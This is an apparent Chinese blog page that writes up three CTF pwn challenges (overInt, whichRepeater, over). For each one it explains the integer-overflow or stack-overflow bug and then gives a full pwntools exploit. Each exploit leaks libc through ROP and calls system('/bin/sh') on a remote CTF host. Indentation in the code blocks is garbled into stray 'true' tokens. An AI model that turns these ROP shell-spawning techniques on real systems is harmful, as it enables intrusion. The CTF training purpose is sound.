<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.9.0">
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="OtterV">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="OtterV">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="Th3 5tupid 0ne">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Pwn训练1 —— 基本的漏洞利用（栈溢出、整数溢出、oﬀ by one） · null</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  --><!-- hexo-inject:begin --><!-- hexo-inject:end -->
    
</head>

    
        <body class="post-body">
    
    
<!-- hexo-inject:begin --><!-- hexo-inject:end --><header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >River5tone</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Pwn训练1 —— 基本的漏洞利用（栈溢出、整数溢出、oﬀ by one）</a>
            </div>
    </div>
    
    <a class="home-link" href=/>River5tone</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/17.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Pwn训练1 —— 基本的漏洞利用（栈溢出、整数溢出、oﬀ by one）
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Binary Security">Binary Security</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Pwn">Pwn</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.1k</span>阅读时长: <span class="post-count reading-time">5 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/07/08</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>题目清单：</p>
<ul>
<li><input checked disabled type="checkbox"> 2018鹏程杯初赛OverInt</li>
<li><input checked disabled type="checkbox"> whichRepeater</li>
<li><input checked disabled type="checkbox"> 2018安恒杯6月Over</li>
</ul>
<h4 id="Such-over（overInt）"><a href="#Such-over（overInt）" class="headerlink" title="Such_over（overInt）"></a>Such_over（overInt）</h4><ol>
<li><p>64位elf，IDA静态分析，程序比较繁琐</p>
</li>
<li><p>输入4字节数key，由sub_4007D1进行check，得到的值应为35，可通过暴力z3跑出很多结果，通过该判定</p>
<img src="/2019/07/08/20190708pwn1/I3.png" title="[]">

<img src="/2019/07/08/20190708pwn1/I4.png" title="[]">

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">a = [BitVec(<span class="string">'a[%d]'</span>%i,<span class="number">32</span>) <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">4</span>)]</span><br><span class="line">ans = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">s = Solver()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line">trues.add(And(a[i]&gt;=<span class="number">30</span>,a[i]&lt;<span class="number">128</span>))</span><br><span class="line">s.add(((((((((ans*<span class="number">4</span>+(a[<span class="number">0</span>]&gt;&gt;<span class="number">4</span>))^(a[<span class="number">0</span>]&lt;&lt;<span class="number">10</span>))</span><br><span class="line">true*<span class="number">4</span>+(a[<span class="number">1</span>]&gt;&gt;<span class="number">4</span>))^(a[<span class="number">1</span>]&lt;&lt;<span class="number">10</span>))</span><br><span class="line">true*<span class="number">4</span>+(a[<span class="number">2</span>]&gt;&gt;<span class="number">4</span>))^(a[<span class="number">2</span>]&lt;&lt;<span class="number">10</span>))</span><br><span class="line">true*<span class="number">4</span>+(a[<span class="number">3</span>]&gt;&gt;<span class="number">4</span>))^(a[<span class="number">3</span>]&lt;&lt;<span class="number">10</span>))</span><br><span class="line">true%<span class="number">47</span> == <span class="number">35</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> s.check() == sat:</span><br><span class="line">trueaa = []</span><br><span class="line">true<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line">truetrueaa[i] = s.model()[<span class="string">'a['</span> + i + <span class="string">']'</span>]</span><br><span class="line">truetrues.add(a[i]!=aa[i])</span><br><span class="line">trueprint(aa)</span><br></pre></td></tr></table></figure>
</li>
<li><p>sub_40071是再次输入4个字节，表示将要输入的数字个数，求其和，需等于v17即0x20633372，随意构造即可。</p>
<img src="/2019/07/08/20190708pwn1/I6.png" title="[]">

<img src="/2019/07/08/20190708pwn1/I5.png" title="[]">
</li>
<li><p>之后需判定使最开始输入的四字节key+v17小于4，这里需得整数溢出。很奇怪得是，我跑的时候溢出多了以为溢出成负数然而并不可以，只有正正好好的溢出0~3，故而直接试了4个数，果然有能通过前面check的，即用。</p>
<img src="/2019/07/08/20190708pwn1/I7.png" title="[]">

<img src="/2019/07/08/20190708pwn1/I1.png" title="[]">
</li>
<li><p>接下来的修改部分不考虑数组大小，可以修改数组之外的部分，即可把payload布置在栈中。</p>
</li>
<li><p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'47.106.94.13'</span>,<span class="string">'50001'</span>)</span><br><span class="line">p = ELF(<span class="string">'./overInt'</span>)</span><br><span class="line">context(os=<span class="string">'linux'</span>,arch=<span class="string">'i386'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pre</span><span class="params">()</span>:</span></span><br><span class="line">truer.recvuntil(<span class="string">'number: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'\x8f\xCC\x9C\x5F'</span>)</span><br><span class="line"></span><br><span class="line">truer.recvuntil(<span class="string">'have?\n'</span>)</span><br><span class="line">truer.send(<span class="string">'\5'</span> + <span class="string">'\0\0\0'</span>)</span><br><span class="line"></span><br><span class="line">truer.recvuntil(<span class="string">'is: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'\0\0\0'</span> + <span class="string">' '</span>)</span><br><span class="line">truer.recvuntil(<span class="string">'is: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'\0\0'</span> + <span class="string">'c'</span> + <span class="string">'\0'</span>)</span><br><span class="line">truer.recvuntil(<span class="string">'is: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'\0'</span> + <span class="string">'3'</span> + <span class="string">'\0\0'</span>)</span><br><span class="line">truer.recvuntil(<span class="string">'is: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'r'</span> + <span class="string">'\0\0\0'</span>)</span><br><span class="line">truer.recvuntil(<span class="string">'is: \n'</span>)</span><br><span class="line">truer.send(<span class="string">'\0\0\0\0'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">modify</span><span class="params">(payload)</span>:</span></span><br><span class="line">truer.recvuntil(<span class="string">'modify?\n'</span>)</span><br><span class="line">truer.send(<span class="string">' '</span> + <span class="string">'\0\0\0'</span>)</span><br><span class="line"></span><br><span class="line">true<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>):</span><br><span class="line">truetruer.recvuntil(<span class="string">'modify?\n'</span>)</span><br><span class="line">truetruer.send(chr(<span class="number">0x38</span> + i) + <span class="string">'\0\0\0'</span>)</span><br><span class="line">truetruer.recvuntil(<span class="string">'in?\n'</span>)</span><br><span class="line">truetruer.send(payload[i])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pre()</span><br><span class="line"></span><br><span class="line">plt_puts = p.plt[<span class="string">'puts'</span>]</span><br><span class="line">got_puts = p.got[<span class="string">'puts'</span>]</span><br><span class="line">vul_addr = <span class="number">0x0040087F</span></span><br><span class="line">rdi_addr = <span class="number">0x00400B13</span></span><br><span class="line"></span><br><span class="line">payload1 = p64(rdi_addr) + p64(got_puts) + p64(plt_puts) + p64(vul_addr)</span><br><span class="line"></span><br><span class="line">modify(payload1)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'hello!'</span>)</span><br><span class="line">puts_addr = u64(r.readline()[<span class="number">0</span>:<span class="number">6</span>] + <span class="string">'\0\0'</span>)</span><br><span class="line">print(puts_addr)</span><br><span class="line"></span><br><span class="line">pre()</span><br><span class="line"></span><br><span class="line">obj = LibcSearcher(<span class="string">'puts'</span>,puts_addr)</span><br><span class="line"></span><br><span class="line">offset_puts = obj.dump(<span class="string">'puts'</span>)</span><br><span class="line">offset_sys = obj.dump(<span class="string">'system'</span>)</span><br><span class="line">offset_binsh = obj.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line"></span><br><span class="line">libcbase = puts_addr - offset_puts</span><br><span class="line">sys_addr = libcbase + offset_sys</span><br><span class="line">binsh_addr = libcbase + offset_binsh</span><br><span class="line"></span><br><span class="line">payload2 = p64(rdi_addr) + p64(binsh_addr) + p64(sys_addr) + p64(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">modify(payload2)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'hello!'</span>)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;b536a9b6-b755-4b10-a6b0-8d42e4c001e8&#125;</span></span><br></pre></td></tr></table></figure>



</li>
</ol>
<h4 id="how-do-with-one（whichRepeater）"><a href="#how-do-with-one（whichRepeater）" class="headerlink" title="how_do_with_one（whichRepeater）"></a>how_do_with_one（whichRepeater）</h4><ol>
<li><p>32位elf，IDA静态分析。</p>
</li>
<li><p>如下图所示，存在着无符号短整型与有符号短整型转换的漏洞。如果输入-32678，其判定为小于等于1024，且能读入0x800个字节。</p>
<img src="/2019/07/08/20190708pwn1/W1.png" title="[]">
</li>
<li><p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'47.106.94.13'</span>,<span class="string">'50002'</span>)</span><br><span class="line">p = ELF(<span class="string">'./whichRepeater'</span>)</span><br><span class="line">context(os=<span class="string">'linux'</span>,arch=<span class="string">'i386'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">plt_puts = p.plt[<span class="string">'puts'</span>]</span><br><span class="line">got_puts = p.got[<span class="string">'puts'</span>]</span><br><span class="line">vul_addr = <span class="number">0x0804877D</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'reapeat?\n'</span>)</span><br><span class="line">r.send(<span class="string">'-32768\n'</span>)</span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">'a'</span>*(<span class="number">0x41B</span> + <span class="number">0x4</span>) + p32(plt_puts) + p32(vul_addr) + p32(got_puts) <span class="comment">#  + 'a'*(0x800 - 0x42B)</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'32768\n'</span>)</span><br><span class="line">r.send(payload1)</span><br><span class="line"></span><br><span class="line">x = r.recvuntil(<span class="string">'reapeat?\n'</span>)</span><br><span class="line">puts_addr = u32(x[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"></span><br><span class="line">obj = LibcSearcher(<span class="string">'puts'</span>, puts_addr)</span><br><span class="line"></span><br><span class="line">offset_puts = obj.dump(<span class="string">'puts'</span>)</span><br><span class="line">offset_sys = obj.dump(<span class="string">'system'</span>)</span><br><span class="line">offset_binsh = obj.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line"></span><br><span class="line">libc = puts_addr - offset_puts</span><br><span class="line">sys_addr = libc + offset_sys</span><br><span class="line">binsh_addr = libc + offset_binsh</span><br><span class="line"></span><br><span class="line">r.send(<span class="string">'-32768\n'</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'a'</span>*(<span class="number">0x41B</span> + <span class="number">0x4</span>) + p32(sys_addr) + p32(<span class="number">1</span>) + p32(binsh_addr) <span class="comment">#  + 'a'*(0x800 - 0x42B)</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'32768\n'</span>)</span><br><span class="line">r.send(payload2)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;23b76a24-2592-4d04-8055-5f4f79a758fb&#125;</span></span><br></pre></td></tr></table></figure>



</li>
</ol>
<h4 id="what-stack（over）"><a href="#what-stack（over）" class="headerlink" title="what_stack（over）"></a>what_stack（over）</h4><ol>
<li><p>64位elf，IDA静态分析。</p>
</li>
<li><p>与ACTF线上赛baby_stack相似，也是只有16字节的利用空间，通过<code>mov esp,ebp | pop ebp</code>，将栈移动，唯一不同的地方是，buf的地址并没有告诉我们，所以我们可以通过输入无意义字符的方式，泄露栈中上一个栈帧，通过计算得到sub_400676函数中的buf地址，即ebp-10h(esp抬高)-10h(返回地址与ebp)-50h(buf偏移量)</p>
<img src="/2019/07/08/20190708pwn1/O6.png" title="[]">

<img src="/2019/07/08/20190708pwn1/O7.png" title="[]">

<img src="/2019/07/08/20190708pwn1/O5.png" title="[]">
</li>
<li><p>从而我们可以获得buf地址，构造栈迁移payload，常规泄露libc地址，因为是x86，64位elf，所以要用<code>pop rdi | ret</code>，将参数传入rdi寄存器。</p>
</li>
<li><p>同理获得libc版本后进行获取权限的payload。不过此时的buf地址，因为之前的操作会有相应的变化，新的buf地址应为<code>当前buf_addr + 40(执行payload) -8(push rbp) + 50h(buf偏移量)</code>。</p>
</li>
<li><p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'47.106.94.13'</span>,<span class="string">'50000'</span>)</span><br><span class="line">p = ELF(<span class="string">'./over'</span>)</span><br><span class="line">context(os=<span class="string">'linux'</span>,arch=<span class="string">'i386'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">plt_puts = p.plt[<span class="string">'puts'</span>]</span><br><span class="line">got_puts = p.got[<span class="string">'puts'</span>]</span><br><span class="line">vul_addr = <span class="number">0x400676</span></span><br><span class="line">rdi_addr = <span class="number">0x400793</span></span><br><span class="line">lev_addr = <span class="number">0x4006be</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">r.send(<span class="string">'a'</span>*<span class="number">0x50</span>)</span><br><span class="line">get_buf_str = r.recvline()[<span class="number">0x50</span>:<span class="number">0x56</span>] + <span class="string">'\0\0'</span></span><br><span class="line">buf_addr = u64(get_buf_str) - <span class="number">0x50</span> - <span class="number">0x10</span> - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">payload1 = p64(<span class="number">1</span>) + p64(rdi_addr) + p64(got_puts) + p64(plt_puts) + p64(vul_addr) + <span class="string">'a'</span>*(<span class="number">0x50</span><span class="number">-40</span>) + p64(buf_addr) + p64(lev_addr)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">r.send(payload1)</span><br><span class="line"></span><br><span class="line">r.recvline()</span><br><span class="line">puts_addr = u64(r.recvline()[<span class="number">0</span>:<span class="number">6</span>]+<span class="string">'\0\0'</span>)</span><br><span class="line"></span><br><span class="line">obj = LibcSearcher(<span class="string">'puts'</span>, puts_addr)</span><br><span class="line"></span><br><span class="line">offset_system = obj.dump(<span class="string">'system'</span>)</span><br><span class="line">offset_binsh = obj.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line">offset_puts = obj.dump(<span class="string">'puts'</span>)</span><br><span class="line"></span><br><span class="line">libcbase = puts_addr - offset_puts</span><br><span class="line">system_addr = libcbase + offset_system</span><br><span class="line">binsh_addr = libcbase + offset_binsh</span><br><span class="line"></span><br><span class="line">buf_addr = buf_addr + <span class="number">32</span> - <span class="number">0x50</span></span><br><span class="line">payload2 = p64(<span class="number">1</span>) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr) + p64(vul_addr) + <span class="string">'a'</span>*(<span class="number">0x50</span><span class="number">-40</span>) + p64(buf_addr) + p64(lev_addr)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">r.send(payload2)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;dc03e80e-2cd9-41a1-8e1d-56aca8aeb5bf&#125;</span></span><br></pre></td></tr></table></figure>

</li>
